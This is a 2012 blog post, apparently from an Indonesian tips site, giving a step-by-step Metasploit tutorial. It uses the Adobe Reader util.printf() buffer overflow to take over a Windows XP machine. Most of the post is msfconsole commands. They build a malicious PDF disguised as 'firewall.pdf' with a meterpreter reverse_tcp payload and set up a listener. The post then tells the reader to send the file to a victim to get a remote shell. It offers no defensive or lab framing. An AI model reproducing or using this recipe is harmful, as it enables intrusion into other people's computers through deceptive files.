Warung Online
Headlines News :
mas template
Home » , » Hack Remote XP PC using Adobe util.printf() Buffer Overflow

Hack Remote XP PC using Adobe util.printf() Buffer Overflow

Written By Trik Cari Duit on Senin, 28 Mei 2012 | 06.54

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.

Exploit Targets
Adobe PDF 8.1.2
Windows XP SP 2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/adobe_utilprintf
Msf exploit (adobe_utilprintf)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_utilprintf)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (adobe_utilprintf)>set filename firewall.pdf
Msf exploit (adobe_utilprintf)>exploit


After we successfully generate the malicious PDF File, it will stored on your local computer
/root/.msf4/local/firewall.pdf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your firewall.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger